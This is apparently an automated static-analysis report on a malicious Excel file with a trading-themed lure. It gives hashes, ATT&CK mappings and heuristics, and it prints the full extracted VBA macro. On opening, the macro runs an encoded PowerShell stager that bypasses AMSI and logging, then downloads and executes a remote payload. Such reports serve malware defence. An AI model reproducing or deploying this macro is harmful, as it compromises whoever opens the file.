Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 47aa007d4818a7d2…

MALICIOUS

Office (OOXML)

21.6 KB Created: 2021-05-30 23:49:02 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2021-06-04
MD5: 236ea0b7d7acc711a15a5c6ad8aa5d9f SHA-1: 6417e24ddbd655d37b8ce984858b85c45e098477 SHA-256: 47aa007d4818a7d204a4f9cca4852470b2599d0581cff7a0451a0bd109af2eca
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that execute automatically upon opening, leveraging WScript.Shell and CreateObject to run a PowerShell command. This PowerShell command is heavily obfuscated but appears to be designed to download and execute a second-stage payload. The document body suggests a financial trading lure to trick users into enabling macros.

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
            x = x + "ACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
            Set asd = CreateObject("WScript.Shell")
            asd.Run (x)
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
            Dim x As String
            x = "powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVg"
            x = x + "BlAHIAcwBpAE8ATgBUAGEAYgBMAGUALgBQAFMAVgBFAFIAcwBp"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            x = x + "ACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
            Set asd = CreateObject("WScript.Shell")
            asd.Run (x)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Attribute VB_Name = "Module1"
    Sub Auto_Open()
            pCb

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8014 bytes
SHA-256: 7231959c4d4e6787e1120713e912987a1e8911002aa96e5cda0e9b80ae3ffba5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()
        pCb
End Sub

Public Function pCb() As Variant
        Dim x As String
        x = "powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVg"
        x = x + "BlAHIAcwBpAE8ATgBUAGEAYgBMAGUALgBQAFMAVgBFAFIAcwBp"
        x = x + "AG8ATgAuAE0AQQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJAA1AD"
        x = x + "MARgAxAD0AWwByAGUAZgBdAC4AQQBzAHMAZQBtAEIATAB5AC4A"
        x = x + "RwBFAHQAVABZAHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbg"
        x = x + "BhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAu"
        x = x + "AFUAdABpAGwAcwAnACkALgAiAEcARQB0AEYASQBlAGAATABEAC"
        x = x + "IAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUAcABQAG8AbABpAGMA"
        x = x + "eQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUA"
        x = x + "B1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwBJAGYAKAAk"
        x = x + "ADUAMwBGADEAKQB7ACQAQQA2ADUAMwA9ACQANQAzAEYAMQAuAE"
        x = x + "cARQB0AFYAYQBsAHUARQAoACQATgB1AGwAbAApADsASQBGACgA"
        x = x + "JABBADYANQAzAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbw"
        x = x + "BjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAYQA2ADUAMwBb"
        x = x + "ACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAG"
        x = x + "cAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAA"
        x = x + "dABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQ"
        x = x + "AwADsAJABhADYANQAzAFsAJwBTAGMAcgBpAHAAdABCACcAKwAn"
        x = x + "AGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AWwAnAEUAbgBhAG"
        x = x + "IAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMA"
        x = x + "YQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAdg"
        x = x + "BBAGwAPQBbAEMAbwBsAEwAZQBjAFQAaQBPAE4AUwAuAEcAZQBu"
        x = x + "AEUAUgBJAGMALgBEAGkAQwBUAEkATwBOAEEAUgBZAFsAcwB0AF"
        x = x + "IAaQBOAGcALABTAFkAUwB0AGUAbQAuAE8AYgBKAGUAYwBUAF0A"
        x = x + "XQA6ADoATgBlAFcAKAApADsAJABWAGEAbAAuAEEAZABkACgAJw"
        x = x + "BFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBj"
        x = x + "AGsATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABWAEEAbAAuAE"
        x = x + "EAZABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwA"
        x = x + "bwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbg"
        x = x + "BnACcALAAwACkAOwAkAEEANgA1ADMAWwAnAEgASwBFAFkAXwBM"
        x = x + "AE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AG"
        x = x + "EAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMA"
        x = x + "bwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUABvAHcAZQByAFMAaA"
        x = x + "BlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBM"
        x = x + "AG8AZwBnAGkAbgBnACcAXQA9ACQAVgBhAGwAfQBFAGwAcwBFAH"
        x = x + "sAWwBTAGMAcgBJAHAAVABCAGwATwBDAGsAXQAuACIARwBFAFQA"
        x = x + "RgBpAEUAYABsAEQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcw"
        x = x + "AnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABh"
        x = x + "AHQAaQBjACcAKQAuAFMARQBUAFYAQQBMAFUAZQAoACQAbgB1AE"
        x = x + "wAbAAsACgATgBFAHcALQBPAEIASgBFAEMAdAAgAEMATwBMAEwA"
        x = x + "RQBjAFQAaQBvAE4AUwAuAEcAZQBOAEUAcgBJAEMALgBIAGEAUw"
        x = x + "BoAFMAZQBUAFsAUwBUAFIAaQBOAGcAXQApACkAfQAkAFIAZQBG"
        x = x + "AD0AWwBSAGUARgBdAC4AQQBTAHMARQBtAGIAbAB5AC4ARwBlAH"
        x = x + "QAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcA"
        x = x + "ZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQ"
        x = x + "BzAGkAJwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBFAEYALgBH"
        x = x + "AGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAC"
        x = x + "cAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkA"
        x = x + "YwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAQQBsAFUAZQ"
        x = x + "AoACQATgBVAGwAbAAsACQAdAByAFUAZQApADsAfQA7AFsAUwB5"
        x = x + "AHMAVABFAG0ALgBOAEUAVAAuAFMAZQBSAFYAaQBjAEUAUABvAE"
        x = x + "kAbgBUAE0AYQBuAEEAZwBFAFIAXQA6ADoARQB4AFAARQBDAFQA"
        x = x + "MQAwADAAQwBvAG4AVABJAE4AVQBFAD0AMAA7ACQAMQBmAGYANA"
        x = x + "A9AE4AZQB3AC0ATwBCAEoARQBDAHQAIABTAFkAcwB0AGUATQAu"
        x = x + "AE4ARQBUAC4AVwBFAEIAQwBsAEkAZQBOAFQAOwAkAHUAPQAnAE"
        x = x + "0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcA"
        x = x + "cwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcg"
        x = x + "BpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAAp"
        x = x + "ACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9AC"
        x = x + "QAKABbAFQAZQBYAFQALgBFAE4AYwBvAGQASQBOAEcAXQA6ADoA"
        x = x + "VQBOAGkAQwBPAGQARQAuAEcAZQBUAFMAdABSAEkATgBHACgAWw"
        x = x + "BDAG8ATgB2AEUAcgBUAF0AOgA6AEYAcgBPAG0AQgBBAHMARQA2"
        x = x + "ADQAUwB0AFIASQBOAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAE"
        x = x + "EAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUA"
        x = x + "QQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdQBBAEQAaw"
        x = x + "BBAE8AUQBBADYAQQBEAGcAQQBPAEEAQQA0AEEARABnAEEAJwAp"
        x = x + "ACkAKQA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAH"
        x = x + "AAaABwACcAOwAkADEARgBGADQALgBIAEUAQQBEAEUAcgBzAC4A"
        x = x + "QQBEAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQ"
        x = x + "ApADsAJAAxAGYAZgA0AC4AUABSAG8AeABZAD0AWwBTAFkAcwB0"
        x = x + "AGUAbQAuAE4AZQBUAC4AVwBlAEIAUgBlAHEAVQBlAHMAVABdAD"
        x = x + "oAOgBEAGUAZgBBAFUATABUAFcAZQBCAFAAcgBPAHgAeQA7ACQA"
        x = x + "MQBGAEYANAAuAFAAUgBvAHgAeQAuAEMAUgBFAGQARQBuAFQAaQ"
        x = x + "BBAGwAcwAgAD0AIABbAFMAWQBzAFQARQBNAC4ATgBlAFQALgBD"
        x = x + "AHIAZQBEAGUAbgBUAGkAQQBMAEMAYQBDAEgARQBdADoAOgBEAE"
        x = x + "UARgBhAHUATAB0AE4ARQB0AFcATwByAGsAQwByAEUAZABlAG4A"
        x = x + "VABJAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQ"
        x = x + "AgAD0AIAAkADEAZgBmADQALgBQAHIAbwB4AHkAOwAkAEsAPQBb"
        x = x + "AFMAWQBzAHQAZQBtAC4AVABFAFgAdAAuAEUAbgBDAG8AZABJAE"
        x = x + "4ARwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAVABlAHMA"
        x = x + "KAAnADcAbABrACsALgA5AD4AYgAwAHwAMQBtAG4AQAA/ACkAZA"
        x = x + "BbACEAcQB7AFYAMgAzACwAcgB6AF0AVABDACUAZgAnACkAOwAk"
        x = x + "AFIAPQB7ACQARAAsACQASwA9ACQAQQByAEcAUwA7ACQAUwA9AD"
        x = x + "AALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0A"
        x = x + "KAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASw"
        x = x + "AuAEMAbwB1AE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBd"
        x = x + "ACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbAC"
        x = x + "QAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkA"
        x = x + "JQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQ"
        x = x + "AlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9"
        x = x + "ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBCAH"
        x = x + "gATwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgA"
        x = x + "XQApACUAMgA1ADYAXQB9AH0AOwAkADEARgBmADQALgBIAGUAYQ"
        x = x + "BEAEUAcgBTAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAi"
        x = x + "AHYAcABmAEEAYgBaAEMAYQB1AGsAdABHAEoAWQA9AHcAMABDAH"
        x = x + "UASgBEAHoAVwBRAGUAUQAyAFQARABXAGwANABvAHkAUABTAE4A"
        x = x + "cAB6AGsAdgBzAD0AIgApADsAJABkAGEAdABBAD0AJAAxAEYAZg"
        x = x + "A0AC4ARABPAFcATgBMAG8AYQBEAEQAQQB0AGEAKAAkAHMARQBS"
        x = x + "ACsAJABUACkAOwAkAGkAVgA9ACQAZABBAFQAYQBbADAALgAuAD"
        x = x + "MAXQA7ACQAZABhAHQAQQA9ACQAZABhAFQAQQBbADQALgAuACQA"
        x = x + "RABhAHQAYQAuAEwARQBuAGcAVABIAF0AOwAtAGoATwBpAG4AWw"
        x = x + "BDAGgAYQBSAFsAXQBdACgAJgAgACQAUgAgACQARABBAFQAYQAg"
        x = x + "ACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
        Set asd = CreateObject("WScript.Shell")
        asd.Run (x)
End Function

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 24576 bytes
SHA-256: 5f5d78c0e64c9d7da8e7758f822dd2e6b31e7cd605d0550a034cc0604a6f4c12